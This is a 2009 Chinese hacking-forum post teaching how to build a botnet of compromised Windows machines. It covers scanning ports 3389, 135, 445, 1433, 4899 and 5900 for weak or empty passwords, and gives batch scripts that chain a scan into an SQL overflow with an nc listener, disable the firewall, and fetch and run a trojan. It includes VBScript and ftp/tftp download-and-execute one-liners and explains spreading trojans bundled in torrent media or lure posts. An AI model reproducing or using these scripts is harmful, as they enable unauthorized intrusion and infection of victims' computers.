WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2513查看
  • 0回复

主题

好友

160

积分

注册会员

发表于 2009-10-31 10:32:24 |显示全部楼层

端口抓肉鸡 的几种方法
1. 3389抓鸡

现在国内网络上流传着一种克隆版的XP,安装后会默认开启
一个账号为new,密码为空的账户,而且基本上都是开着3389的,
我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S
扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放
3389的机器(也可以把结果保存为文本文件,用批量生成3389
连接的工具来连接),然后输入账号new登入,如果别人的电
脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~
这种方法只针XP系统,如果遇到2000或者2003系统就不要试了
呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你
再登入上去就会把他挤出去(XP只支持单用户登入,用户登入
需要用工具开),或者电脑前有人你就不可能去打开IE下载木
马了。

  2、扫135端口抓肉鸡

  首先先用端口扫描器扫一段IP的135端口,然后把结果保存
,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传
马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的
135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画
可以去黑客网站搜索135)

  3、扫445端口抓肉鸡

  和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445
端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,
最后用啊D工具包开共享传马。因为现在135和445端口都被防
火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地
的445肉鸡来扫。(详细动画可以去黑客网站搜索445)

  4、1433端口批量溢出抓肉鸡

这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已
经不高了。要用到的工具:S扫 sqlhello.exe nc.exe 批处理文件
首先先写个批处理,打开记事本,把以下代码复制修改后,储
存为扫描+溢出.bat文件
@echo off
for /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j
1433 1000 /save
@echo off
for /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i
1433 xxx.xxx.xx.xx 556
还要新建一个tt.txt,里面你要扫的IP段,格式为
XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格
1433是要扫描的端口,1000是扫描线程数 ,do sqlhello %%i
1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是后面NC监
听的端口然后再写个批处理
@echo off
Nc -l -vv -p 556>daima.txt
echo username>>daima.txt
echo password>>daima.txt
echo bin>>daima.txt(以2进制传输数据)
echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt
echo bye>>daima.txt
net stop sharedaccess(关闭WINDOWS自带防火墙)
ftp -s:daima.txt
xxx.exe(也是填你木马的文件名)
del daima.txt
注意上面的代码回车符别删掉,要不然就没法下你的马了。



几种肉鸡上传文件的方法
  tftp法
  先在自己某机器上建个tftp服务器,如执行tftpd32.exe,
  再将文件(sample.exe)上传到别的机器中(肉鸡),
  肉鸡cmd中执行: tftp -i 服务器ip get sample.exe

   ftp法
  肉鸡cmd中执行:
  echo open ftp服务器ip [端口]>ftp.txt
  echo username>>ftp.txt
  echo password>>ftp.txt
  echo get sample.exe>>ftp.txt
  echo bye>>ftp.txt
  ftp -s:ftp.txt
  del ftp.txt

  工具法
  利用wineggdrop的wget.exe
  肉鸡cmd中执行:wget 网站/sample.exe

  利用dl.vbe法
  肉鸡cmd中执行:
  echo with wscript:if .arguments.count^<2 then .quit:end if
>dl.vbe
  echo set aso=.createobject("adodb.stream"):set
web=createobject    ("microsoft.xmlhttp") >>dl.vbe
  echo web.open "get",.arguments(0),0:web.send:if
web.status^>200 then quit >>dl.vbe
  echo
aso.type=1:aso.open:aso.writeweb.responsebody:aso.saveto file
.arguments(1),2:end with >dl.vbe

  cscript dl.vbe http://*。*。*。*:88/sample.exe sample.exe

  利用iget.vbe法
  方法同4,
  肉鸡cmd中执行:
  echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
  echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
  echo Set xPost = CreateObject("Microsoft.XMLHTTP")
>>iget.vbe
  echo xPost.Open "GET",iRemote,0 >>iget.vbe
  echo xPost.Send() >>iget.vbe
  echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
  echo sGet.Mode = 3 >>iget.vbe
  echo sGet.Type = 1 >>iget.vbe
  echo sGet.Open() >>iget.vbe
  echo sGet.Write(xPost.responseBody) >>iget.vbe
  echo sGet.SaveToFile iLocal,2 >>iget.vbe

  cscript iget.vbe http://*。*。*。*/sample.exe sample.exe

  利用Http网站vbe法
  echo Set xPost = CreateObject("Microsoft.XMLHTTP")
>dsa.vbe
  echo xPost.Open "GET","http://*.*.*.*/sample.exe",0
>>dsa.vbe
  echo xPost.Send() >>dsa.vbe
  echo Set sGet = CreateObject("ADODB.Stream") >>dsa.vbe
  echo sGet.Mode = 3 >>dsa.vbe
  echo sGet.Type = 1 >>dsa.vbe
  echo sGet.Open() >>dsa.vbe
  echo sGet.Write(xPost.responseBody) >>dsa.vbe
  echo sGet.SaveToFile "sample.exe",2 >>dsa.vbe cscript
dsa.vbe
del dsa.vbe




  3389法
  可以开3389,然后登陆,进行本地的下载。该方法对服务
器上传很严格的机器特有效。(包括硬件防火墙)


  先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以
去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下
马执行,爽吧!所以这里讲详细点,呵呵。还有42 21端口也
可以这样溢出,只要用这些端口的溢出工具就好了,详细动画
可以去黑客网站搜索1433。

  忘了说,上面的工具和批处理什么的都要放在同一个文件
夹下。

  先休息一下,打这么多字累死了

  继续

  5、扫1433抓肉鸡之方法2

  要用到的工具:端口扫描器 X-scan SQL综合利用工具

  上面我们说过了,1433溢出现在成功率已经不高了,所以我
们可以用另一种方法。开了1433端口的机器一般都装了SQL,
所以我们可以猜测SQL弱口令来抓1433肉鸡。

  首先先用端口扫描器扫一段IP的1433端口,然后结果保存为
文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描
参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了
,其他不要勾。然后在插件设置-端口相关设置-待检测端口这
一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会
有个报告,列出了有弱口令的机器,然后打开SQL综合利用工
具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-
利用目录,上传你的木马,然后在用DOS命令执行你的木马就
OK了。

  6、用WINNTAutoAttack扫SA弱口令抓肉鸡

  其实这个原理和上面一样,效率也没上面的高,只是想让大
家知道下,呵呵。

  工具:WINNTAutoAttack SQL综合利用工具

  打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下
的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA
账号,接着开始扫描,扫完后,用 SQL综合利用工具连上传马
执行就好了。

    7、扫4899空口令抓肉鸡

  工具:端口扫描器 4899探测器 Radmin

  首先先用端口扫描器扫一段IP的4899端口,然后用4899探测
器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有
空口令的机器,带开文件管理,上传的你木马运行就OK了。
详细动画可以去黑客网站搜索4899

  8、扫5900端口抓VNC肉鸡

  工具:VNC扫描器 VNC连接器

  首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描
器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -
vnc -vv 扫描完成后会在扫描器所在的同一文件夹生成一个文
本文件,打开后有一列IP,IP后面的有一些单词比如
patched,banned,vulnerable,只有单词为vulnerable才能连接。接着
就用VNC连接器连接,下面就不用多说了吧? 详细动画可以去
黑客网站搜索VNC

  接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费
空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介
绍几种我会的。

  1、BT挂马

  顾名思义,就是把你的木马发布到BT网站让人下载。当然如
果只把单纯的木马文件发布上去效果肯定不好,而且现在一般
的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法
。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在
一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里
有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后
,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤
其是下XXX片的时候 当然你也可以做个网页木马,然后把你网
页木马的地址插入到你发布的文件中(不是所有文件都可以这
样的,我只知道RM和EXE文件可以插入),别人下载打开后同
时也会带开你的网页木马,如果他的系统没有补供你网页木马
所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想
,我把木马和其他文件捆绑后格式保持为那个文件(比如RM
捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?

  呵呵,如果真有这样的好事那我上面何不说把木马和BT种子
文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说
一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,
除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后
的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在
很少,大多都被补了,就算有别人也不一定会公开,为什么想
想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对
winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行
绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR
文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR
文件体积变小,减少的体积就为木马的体积。然后再次打开这
个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各
位赶快更新下WINRAR版本,小心中马哈。

  2、免费空间挂马

  其实和BT差不多,就是把做好的木马上传到你申请的免费空
间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点
是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。
我这几天就是这样挂的,弄个免费空间,上传个木马,到2个
XXX论坛发个帖子,每天睡前一顶.



快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-4-29 17:02 , Processed in 0.070686 second(s), 16 queries .

返回顶部